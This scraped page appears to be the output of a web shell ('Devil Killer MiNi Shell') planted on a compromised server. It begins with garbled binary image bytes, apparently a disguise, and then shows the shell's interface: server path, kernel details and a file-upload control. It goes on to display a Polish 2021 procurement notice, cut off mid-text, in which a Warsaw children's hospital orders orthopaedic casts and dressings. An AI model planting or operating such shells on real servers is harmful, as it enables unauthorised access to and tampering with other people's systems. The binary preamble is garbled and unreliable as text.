JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210624/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210624/0009239401-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00092394 z dnia 2021-06-24</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> „Dostawy gipsów i zabezpieczenie drutów stosowanych w ortopedii z podziałem na pakiety” RZP-9/IM/2021 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Szpital Dziecięcy im. prof. dr. med. Jana Bogdanowicza SPZOZ</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Szpital Dziecięcy</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000297359</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Niekłańska 4/24</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">03-924</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp@nieklanska.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.nieklanska.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Samodzielny Publiczny Zakład Opieki Zdrowotnej </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Dostawy gipsów i zabezpieczenie drutów stosowanych w ortopedii z podziałem na pakiety” RZP-9/IM/2021 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-34f0ec8a-d3f3-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00092394</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-06-24</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00003251/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.21 Gipsy oraz zabezpieczenie drutów stosowanych w ortopedii</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://nieklanska.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://nieklanska.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający określa dopuszczalny format kwalifikowanego podpisu elektronicznego:a. dokumenty w<br/>formacie pdf należy podpisywać tylko formatem PAdES;b. Zamawiający dopuszcza podpisanie<br/>dokumentów w formacie innym niż ,,pdf", wtedy należy użyć formatu XadES.2) Zamawiający określa<br/>niezbędne wymagania sprzętowo – aplikacyjne umożliwiające pracę w Systemie:a. stały dostęp do<br/>sieci Internet;b. zainstalowana przeglądarka internetowa: • Chrome w wersji 45 lub późniejsze –<br/>zalecana; • Firefox w wersji 46 lub późniejsze;• Opera w wersji 37 lub późniejsze;c. włączona obsługa<br/>JavaScript;d. oprogramowanie SzafirHost zainstalowane w systemie operacyjnym;e. zainstalowany<br/>program Acrobat Reader lub inny umożliwiający obsługę formatów pdf;f. dopuszczalny format<br/>przesyłanych danych tj. plików o wielkości do 100 MB – pdf, doc, docx, xls, xlsx;g. zainstalowany<br/>dodatek Szafir SDK Web do przeglądarek;h. zainstalowane środowisko Java w wersji minimum 1.8<br/>(jre). Pozostałe informacje znajdują się w SWZ, Rozdział XIV - wymagania techniczne i organizacyjne na stronie<br/>platformy na stronie https://nieklanska.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RZP-9/IM/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Gipsy syntetyczne - żywica zwane dalej „artykułami” w asortymencie i ilościach określonych w załączniku nr 2 - Formularzu asortymentowo-cenowym zawierającym opis przedmiotu zamówienia stanowiącym integralną część SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33141000-0 - Jednorazowe, niechemiczne artykuły medyczne i hematologiczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">36 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">50</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Jakość/na podstawie dostarczonych próbek</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">50</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Opaski gipsowe i podkłady pod gips zwane dalej „artykułami” w asortymencie i ilościach określonych w załączniku nr 2 - Formularzu asortymentowo-cenowym zawierającym opis przedmiotu zamówienia stanowiącym integralną część SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33141000-0 - Jednorazowe, niechemiczne artykuły medyczne i hematologiczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">36 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">50</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Jakość/na podstawie dostarczonych próbek</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">50</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Opatrunki wydzielające srebro do zabezpieczania drutów stosowanych w ortopedii zwane dalej „artykułami” w asortymencie i ilościach określonych w załączniku nr 2 - Formularzu asortymentowo-cenowym zawierającym opis przedmiotu zamówienia stanowiącym integralną część SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33141000-0 - Jednorazowe, niechemiczne artykuły medyczne i hematologiczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">36 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">informację z Krajowego Rejestru Karnego w zakresie określonym w art. 108 ust. 1 pkt 1 i 2 uPzp,<br/>wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert – otrzymany dokument<br/>w postaci papierowej musi zostać złożony w postaci dokumentu elektronicznego, opatrzonego<br/>podpisem kwalifikowanym lub zaufanym lub podpisem osobistym Wykonawcy. W przypadku składania<br/>informacji z Krajowego Rejestru Karnego otrzymanej przez Wykonawcę za pomocą systemu<br/>informatycznego e-KRK Wykonawca składa na Platformie wszystkie pliki jakie otrzymał z Krajowego<br/>Rejestru Karnego. Wykonawca nie podpisuje otrzymanego pliku;b) oświadczenie wykonawcy o braku<br/>wydania wobec niego prawomocnego wyroku sądu lub ostatecznej decyzji administracyjnej o<br/>zaleganiu z uiszczaniem podatków, opłat lub składek na ubezpieczenia społeczne lub zdrowotne albo -<br/>w przypadku wydania takiego wyroku lub decyzji - dokumentów potwierdzających dokonanie płatności<br/>tych należności wraz z ewentualnymi odsetkami lub grzywnami lub zawarcie wiążącego porozumienia<br/>w sprawie spłat tych należności – wzór oświadczenia stanowi Załącznik nr 7 do niniejszej SWZ;c)<br/>Ogłoszenie nr z dnia<br/>Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy<br/>oświadczenie wykonawcy o braku orzeczenia wobec niego tytułem środka zapobiegawczego zakazu<br/>ubiegania się o zamówienia publiczne – wzór oświadczenia stanowi Załącznik nr 7 do niniejszej<br/>SWZ;d) oświadczenie Wykonawcy o przynależności bądź braku przynależności do tej samej grupy<br/>kapitałowej, w rozumieniu przepisów ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i<br/>konsumentów (Dz.U. z 2021 r., poz. 275) – Załącznik nr 5 do niniejszej SWZ. Wraz ze złożeniem<br/>oświadczenia, Wykonawca może przedstawić dowody, że powiązania z innym wykonawcą nie<br/>prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1. Oświadczenie Wykonawcy, że oferowane produkty zakwalifikowane, jako wyroby medyczne w rozumieniu ustawy z dnia 20.05.2010 r. o wyrobach medycznych (tekst jednolity, Dz. U. z 2020 r.<br/>poz. 186) posiadają odpowiedni Certyfikat CE, Deklarację zgodności lub Deklarację zgodności ze znakiem CE oraz dokument potwierdzający dokonanie zgłoszenia wyrobu do Prezesa Urzędu Rejestracji Produktów Leczniczych, Wyrobów Medycznych i Produktów Biobójczych zwanego dalej Prezesem Urzędu, lub dokument potwierdzający dokonanie powiadomienia Prezesa<br/>Urzędu o wprowadzeniu na terytorium RP wyrobu przeznaczonego do używania na tym terytorium - wzór oświadczenia stanowi Załącznik nr 8 do niniejszej SWZ;<br/>2. Oświadczenie Wykonawcy o posiadaniu odpowiednich dokumentów w przypadku, gdy następuje pierwsze udostępnienie na terytorium państwa członkowskiego wyrobu gotowego do użycia w celu jego używania zgodnie z przewidzianym zastosowaniem (wprowadzenie do używania) - wzór oświadczenia stanowi Załącznik nr 8 do niniejszej SWZ;<br/>3. Oświadczenie Wykonawcy, że posiada odpowiednie dokumenty dopuszczające do obrotu i stosowania, w przypadku jeśli nie podlegają w/w przepisom - wzór oświadczenia stanowi Załącznik nr 8 do niniejszej SWZ;<br/>4. Katalogi ze zdjęciami i opisami oferowanych artykułów w celu potwierdzenia zgodności zaoferowanych artykułów z zapisami SWZ do Pakietu nr 3.<br/>5. W celu dokonania oceny jakościowej należy złożyć:<br/>do Pakietu nr 1 - po 6 szt. próbek oferowanego asortymentu,<br/>Pakietu nr 2 <br/>poz. od 1 do 6 - po 6 opakowań próbek oferowanego asortymentu,<br/>poz. od 7 do 11 - po 6 szt. próbek oferowanego asortymentu.<br/>Złożone próbki nie podlegają wymianie i uzupełnieniu. Brak próbek skutkować będzie odrzuceniem oferty. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> 1. Oświadczenie Wykonawcy, że oferowane produkty zakwalifikowane, jako wyroby medyczne w<br/>rozumieniu ustawy z dnia 20.05.2010 r. o wyrobach medycznych (tekst jednolity, Dz. U. z 2020 r.<br/>poz. 186) posiadają odpowiedni Certyfikat CE, Deklarację zgodności lub Deklarację zgodności<br/>ze znakiem CE oraz dokument potwierdzający dokonanie zgłoszenia wyrobu do Prezesa Urzędu<br/>Rejestracji Produktów Leczniczych, Wyrobów Medycznych i Produktów Biobójczych zwanego<br/>dalej Prezesem Urzędu, lub dokument potwierdzający dokonanie powiadomienia Prezesa<br/>Urzędu o wprowadzeniu na terytorium RP wyrobu przeznaczonego do używania na tym<br/>terytorium - wzór oświadczenia stanowi Załącznik nr 8 do niniejszej SWZ;<br/>2. Oświadczenie Wykonawcy o posiadaniu odpowiednich dokumentów w przypadku, gdy<br/>następuje pierwsze udostępnienie na terytorium państwa członkowskiego wyrobu gotowego do<br/>użycia w celu jego używania zgodnie z przewidzianym zastosowaniem (wprowadzenie do<br/>używania) - wzór oświadczenia stanowi Załącznik nr 8 do niniejszej SWZ;<br/>3. Oświadczenie Wykonawcy, że posiada odpowiednie dokumenty dopuszczające do obrotu i<br/>stosowania, w przypadku jeśli nie podlegają w/w przepisom - wzór oświadczenia stanowi<br/>Załącznik nr 8 do niniejszej SWZ;<br/>4. Katalogi ze zdjęciami i opisami oferowanych artykułów w celu potwierdzenia zgodności zaoferowanych artykułów z zapisami SWZ do Pakietu nr 3. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Zamawiający wymaga wniesienia przez Wykonawcę wadium w kwocie:<br/><br/><br/><br/>Pakiet nr 1	kwota: 1 250,00 zł <br/>słownie: jeden tysiąc dwieście pięćdziesiąt złotych i 00/100<br/>Pakiet nr 2	kwota: 2 500,00 zł <br/>słownie: dwa tysiące pięćset złotych i 00/100<br/>Pakiet nr 3	kwota: 250,00 zł <br/>słownie: dwieście pięćdziesiąt złotych i 00/100<br/><br/><br/>2.	Wadium należy wnieść do upływu terminu składania ofert, Pozostałe informacje dotyczące wadium zawarte są w SWZ, Rozdział V <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 3) Strony dopuszczają możliwość zmian w umowie na warunkach określonych w art. 455 uPzp<br/>oraz w przypadku gdy Wykonawcę, któremu Zamawiający udzielił zamówienia ma zastąpić nowy<br/>Wykonawca w wyniku sukcesji, wstępując w prawa i obowiązki wykonawcy, w następstwie<br/>przejęcia, połączenia, podziału, przekształcenia, upadłości, restrukturyzacji, dziedziczenia lub<br/>nabycia dotychczasowego wykonawcy lub jego przedsiębiorstwa, o ile nowy wykonawca spełnia<br/>warunki udziału w postępowaniu, nie zachodzą wobec niego podstawy wykluczenia oraz nie<br/>pociąga to za sobą innych istotnych zmian umowy, a także nie ma na celu uniknięcia<br/>stosowania przepisów ustawy.<br/>3) Ponadto Strony dopuszczają zmiany w umowie w następujących przypadkach:<br/>a. Zmiany i uzupełnienia niżej wymienione do umowy mogą być dokonane za zgodą obu stron<br/>wyrażoną na piśmie pod rygorem nieważności:<br/>1. zmiana stron umowy na zasadach określonych w kodeksie Cywilnym;<br/>2. zmiana cen jednostkowych brutto na niższe niż zaoferowane.<br/>3. dopuszcza się przedłużenie terminu obowiązywania umowy w przypadku niewykorzystania<br/>środków finansowych określonych w umowie;<br/>4. zmiana urzędowa stawki podatku VAT, przy czym zmianie ulegnie wyłącznie cena brutto,<br/>cena netto pozostanie bez zmian (obowiązuje od dnia wejścia w życie odpowiednich przepisów<br/>o zmianie stawki podatku VAT);<br/>5. zmiana wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki<br/>godzinowej, ustalonych na przepisów 